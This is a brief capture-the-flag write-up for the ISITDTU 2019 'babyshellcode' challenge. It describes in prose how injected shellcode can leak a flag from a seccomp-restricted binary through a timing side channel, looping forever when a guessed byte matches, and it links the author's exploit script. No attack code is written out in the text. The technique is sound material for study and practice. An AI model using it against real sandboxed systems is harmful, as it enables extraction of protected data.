Tags: shellcode 

Rating: 3.0

This executable will read flag to `0xcafe000` then xor flag with 8 random bytes, then execute what we input before zeroing all commom registers except rip. And there is a seccomp sandbox which only allows us to use `SYS_alarm`.

No syscall, no output, so my strategy is to use `side channel`:

I read random byte from `0xcafe028~0xcafe030`(with xored with `\x00`, these 8 bytes is what we got from `/dev/urandom`) and read flag[i] from `0xcafe000~?` byte by byte. Then `xor flag[i], random[i]` and we got flag[i] in plaintext in memory! So we can write a shellcode which tends to be an infinite loop when flag[i] is equal with the guessed value.

So we can get flag byte by byte.

> Actually, we can even don't use `SYS_alarm` because 5 seconds is a long time for us to judge whether we face an infinite loop.

Read my [exploit](https://github.com/bash-c/pwn_repo/blob/master/ISITDTU2019_babyshellcode/solve.py) for more details and follow [me](https://github.com/bash-c) if you like this Writeup :)